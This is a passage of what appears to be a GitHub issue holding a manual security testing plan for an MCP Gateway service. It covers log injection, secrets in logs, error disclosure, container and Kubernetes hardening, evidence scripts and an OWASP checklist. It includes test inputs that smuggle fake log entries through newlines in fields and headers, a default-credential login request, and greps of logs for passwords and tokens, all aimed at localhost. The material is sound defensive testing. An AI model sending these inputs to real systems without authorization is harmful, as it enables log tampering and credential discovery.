curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "test\nFAKE LOG ENTRY: [ERROR] System compromised by admin",
"url": "http://example.com"
}' \
http://localhost:4444/admin/tools
# Test log injection via HTTP headers
curl -H "Authorization: Bearer $JWT_TOKEN" \
-H "User-Agent: Mozilla/5.0\nFAKE LOG: Admin password changed" \
http://localhost:4444/admin/tools
# Check if logs are properly sanitized
tail -f logs/mcpgateway.log | grep -E "(FAKE|injection|compromise)"8.2 Sensitive Data Exposure in Logs
# Test for credential logging
grep -r -i "password\|secret\|token\|key" logs/
# Test for PII logging
grep -r -E "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b" logs/
# Test for sensitive parameter logging
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "test-tool",
"url": "http://example.com",
"auth_value": "secret-api-key-12345"
}' \
http://localhost:4444/admin/tools
grep -i "secret-api-key" logs/Error Handling Security
8.3 Error Message Information Disclosure
# Test error message disclosure
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{"invalid": "json"' \
http://localhost:4444/admin/tools
# Test stack trace exposure
curl -X POST -H "Authorization: Bearer $JWT_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"name": "test",
"url": "http://localhost:99999"
}' \
http://localhost:4444/admin/tools
# Test database error exposure
curl -X GET -H "Authorization: Bearer $JWT_TOKEN" \
"http://localhost:4444/admin/tools/999999999"9. 🐳 Deployment & Container Security
Production Deployment Security
9.1 Production Configuration Validation
# Create production-like environment
cat > .env.prod << EOF
AUTH_REQUIRED=true
BASIC_AUTH_PASSWORD=strong-production-password
JWT_SECRET_KEY=$(openssl rand -hex 32)
SKIP_SSL_VERIFY=false
LOG_LEVEL=WARNING
DEBUG=false
EOF
# Test production configuration
docker run --env-file .env.prod mcpgateway:latest python3 -c "
from mcpgateway.config import Settings
import os
settings = Settings()
print('Production Security Check:')
print(f'Strong password: {len(settings.basic_auth_password) >= 12}')
print(f'Strong JWT secret: {len(settings.jwt_secret_key) >= 32}')
print(f'Auth required: {settings.auth_required}')
print(f'SSL verify enabled: {not settings.skip_ssl_verify}')
"9.2 Container Registry Security
# Test container image vulnerabilities
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
aquasec/trivy image mcpgateway:latest
# Test container secrets scanning
docker run --rm -v $PWD:/src trufflesecurity/trufflehog:latest \
filesystem /src --only-verified
# Test container compliance
docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
docker/docker-bench-securityKubernetes Security Testing
9.3 K8s Security Compliance
# Test pod security standards
kubectl apply -f - << EOF
apiVersion: v1
kind: Pod
metadata:
name: mcpgateway-security-test
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
fsGroup: 2000
containers:
- name: mcpgateway
image: mcpgateway:latest
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
readOnlyRootFilesystem: true
resources:
limits:
memory: "512Mi"
cpu: "500m"
requests:
memory: "256Mi"
cpu: "250m"
EOF
# Test network policies
kubectl apply -f - << EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: mcpgateway-netpol
spec:
podSelector:
matchLabels:
app: mcpgateway
policyTypes:
- Ingress
- Egress
ingress:
- from:
- podSelector:
matchLabels:
app: allowed-client
ports:
- protocol: TCP
port: 4444
EOF
# Test RBAC permissions
kubectl auth can-i create pods --as=system:serviceaccount:default:mcpgateway
kubectl auth can-i get secrets --as=system:serviceaccount:default:mcpgateway10. 📝 Documentation & Evidence Collection
Security Testing Documentation
10.1 Evidence Collection Process
#!/bin/bash
# Manual security testing evidence collection script
EVIDENCE_DIR="security-evidence-$(date +%Y%m%d-%H%M%S)"
mkdir -p "$EVIDENCE_DIR"
echo "🔍 Collecting security testing evidence..."
# System information
uname -a > "$EVIDENCE_DIR/system-info.txt"
docker version > "$EVIDENCE_DIR/docker-version.txt"
python3 --version > "$EVIDENCE_DIR/python-version.txt"
# Configuration snapshots
cp .env "$EVIDENCE_DIR/environment-config.txt" 2>/dev/null || echo "No .env file" > "$EVIDENCE_DIR/environment-config.txt"
# Network configuration
netstat -tulpn > "$EVIDENCE_DIR/network-listening.txt"
ss -tulpn > "$EVIDENCE_DIR/socket-stats.txt"
# Process information
ps aux | grep mcpgateway > "$EVIDENCE_DIR/process-info.txt"
# Log samples
tail -100 logs/mcpgateway.log > "$EVIDENCE_DIR/log-sample.txt" 2>/dev/null || echo "No logs found" > "$EVIDENCE_DIR/log-sample.txt"
# Database schema
sqlite3 mcp.db ".schema" > "$EVIDENCE_DIR/database-schema.txt" 2>/dev/null || echo "No database found" > "$EVIDENCE_DIR/database-schema.txt"
# Container information
docker inspect mcpgateway:latest > "$EVIDENCE_DIR/container-inspect.json" 2>/dev/null || echo "No container found" > "$EVIDENCE_DIR/container-inspect.json"
echo "✅ Evidence collected in $EVIDENCE_DIR"10.2 Security Test Report Generation
#!/usr/bin/env python3
"""Generate comprehensive manual security testing report."""
import json
import os
from datetime import datetime
from pathlib import Path
def generate_security_report():
"""Generate manual security testing report."""
report = {
"report_metadata": {
"title": "MCP Gateway Manual Security Testing Report",
"version": "1.0",
"date": datetime.now().isoformat(),
"tester": os.getenv("SECURITY_TESTER", "Security Team"),
"environment": os.getenv("TEST_ENVIRONMENT", "staging")
},
"executive_summary": {
"total_tests": 0,
"passed": 0,
"failed": 0,
"critical_findings": 0,
"high_findings": 0,
"medium_findings": 0,
"low_findings": 0
},
"test_categories": {
"authentication": {"status": "pending", "findings": []},
"authorization": {"status": "pending", "findings": []},
"network_security": {"status": "pending", "findings": []},
"business_logic": {"status": "pending", "findings": []},
"data_handling": {"status": "pending", "findings": []},
"configuration": {"status": "pending", "findings": []},
"federation": {"status": "pending", "findings": []},
"monitoring": {"status": "pending", "findings": []},
"deployment": {"status": "pending", "findings": []}
},
"detailed_findings": [],
"remediation_plan": [],
"compliance_mapping": {
"owasp_top10": [],
"nist_csf": [],
"soc2": []
}
}
# Sample finding structure
sample_finding = {
"id": "MCP-SEC-001",
"title": "Default Credentials Detected",
"severity": "high",
"category": "authentication",
"description": "Default credentials found in configuration",
"impact": "Unauthorized access to admin interface",
"likelihood": "high",
"cvss_score": 8.1,
"cwe_id": "CWE-798",
"owasp_category": "A07:2021 - Identification and Authentication Failures",
"evidence": {
"request": "curl -u admin:changeme http://localhost:4444/admin",
"response": "200 OK",
"screenshot": "evidence/screenshot-001.png"
},
"remediation": {
"description": "Change default credentials to strong passwords",
"effort": "low",
"priority": "immediate"
},
"references": [
"https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/",
"https://cwe.mitre.org/data/definitions/798.html"
]
}
# Write report
with open("security-manual-testing-report.json", "w") as f:
json.dump(report, f, indent=2)
print("📊 Manual security testing report template generated")
print("📝 Fill in test results and findings")
print("📋 Use for compliance documentation")
if __name__ == "__main__":
generate_security_report()Compliance Checklist
10.3 OWASP Top 10 Mapping
# OWASP Top 10 2021 Testing Checklist
## A01:2021 - Broken Access Control
- [ ] Horizontal privilege escalation testing
- [ ] Vertical privilege escalation testing
- [ ] Direct object reference testing
- [ ] Admin function access control
## A02:2021 - Cryptographic Failures
- [ ] TLS configuration validation
- [ ] JWT secret strength testing
- [ ] Password hashing verification
- [ ] Sensitive data transmission
## A03:2021 - Injection
- [ ] SQL injection testing
- [ ] NoSQL injection testing
- [ ] Command injection testing
- [ ] JSONPath injection testing
## A04:2021 - Insecure Design
- [ ] Business logic flaw testing
- [ ] Federation trust model validation
- [ ] Rate limiting bypass testing
- [ ] Protocol confusion testing
## A05:2021 - Security Misconfiguration
- [ ] Default credential testing
- [ ] Debug mode validation
- [ ] Security header testing
- [ ] Container security configuration
## A06:2021 - Vulnerable and Outdated Components
- [ ] Dependency vulnerability scanning
- [ ] Container base image scanning
- [ ] Third-party tool security validation
## A07:2021 - Identification and Authentication Failures
- [ ] JWT lifecycle testing
- [ ] Session management testing
- [ ] Brute force protection testing
- [ ] Multi-factor authentication (if implemented)
## A08:2021 - Software and Data Integrity Failures
- [ ] Code signing validation
- [ ] Update mechanism security
- [ ] Federation integrity testing
- [ ] Cache poisoning testing
## A09:2021 - Security Logging and Monitoring Failures
- [ ] Log injection testing
- [ ] Sensitive data in logs validation
- [ ] Incident response testing
- [ ] Anomaly detection validation
## A10:2021 - Server-Side Request Forgery (SSRF)
- [ ] External URL validation
- [ ] Internal network access testing
- [ ] Federation SSRF testing
- [ ] Tool URL validation🎯 Security Testing Execution Guide
Pre-Testing Setup
-
Environment Preparation
# Setup test environment make security-manual-setup # Start MCP Gateway in test mode AUTH_REQUIRED=true BASIC_AUTH_PASSWORD=test123 make run-dev # Generate test JWT token export JWT_TOKEN=$(python3 -m mcpgateway.utils.create_jwt_token \ --username admin --exp 3600 --secret my-test-key)
-
Tool Installation
# Install required testing tools apt-get update && apt-get install -y \ curl httpie jq netcat nmap openssl sqlite3 \ docker.io redis-tools postgresql-client # Install specialized security tools pip install jwt websocket-client npm install -g wscat
Testing Execution Order
- Phase 1: Authentication & Authorization (Critical)
- Phase 2: Network & Transport Security (High)
- Phase 3: Business Logic & Protocol (High)
- Phase 4: Data Handling & Injection (High)
- Phase 5: Configuration & Infrastructure (Medium)
- Phase 6: Federation & Integration (Medium)
- Phase 7: Monitoring & Incident Response (Low)
- Phase 8: Deployment & Container (Medium)
- Phase 9: Documentation & Evidence (Required)
Severity Assessment Criteria
- Critical: Authentication bypass, RCE, data breach
- High: Privilege escalation, injection, sensitive data exposure
- Medium: Information disclosure, DoS, configuration issues
- Low: Minor information leakage, non-exploitable findings
Pass/Fail Criteria
- Critical/High findings: Release blocked until fixed
- Medium findings: Must be addressed or accepted with risk
- Low findings: Document for future releases
🔄 Continuous Security Validation
This manual testing plan should be executed:
- Before every major release (complete test suite)
- Before security updates (relevant test categories)
- After infrastructure changes (deployment & configuration tests)
- During security incidents (incident response validation)
- Quarterly (compliance and regression testing)
The testing artifacts and evidence collected serve as proof of due diligence for compliance audits and provide a baseline for future security assessments.
📚 References & Tools
Security Testing Frameworks:
- OWASP Testing Guide v4.0
- NIST SP 800-115 Technical Guide to Information Security Testing
- PTES (Penetration Testing Execution Standard)
Essential Tools:
curl,httpie- HTTP testingjwt.io, custom scripts - JWT manipulationnmap,openssl- Network security scanningsqlmap- SQL injection testingburp suite,owasp zap- Web application testingdocker,trivy- Container securitykubectl,kube-bench- Kubernetes security
Metadata
Metadata
Assignees
Labels
Linting, formatting, dependency hygiene, or project maintenance choresIssue with CI/CD process (GitHub Actions, scaffolding)DevOps activities (containers, automation, deployment, makefiles, etc)Extra attention is neededImproves securityTesting (unit, e2e, manual, automated, etc)Issues / Features awaiting triage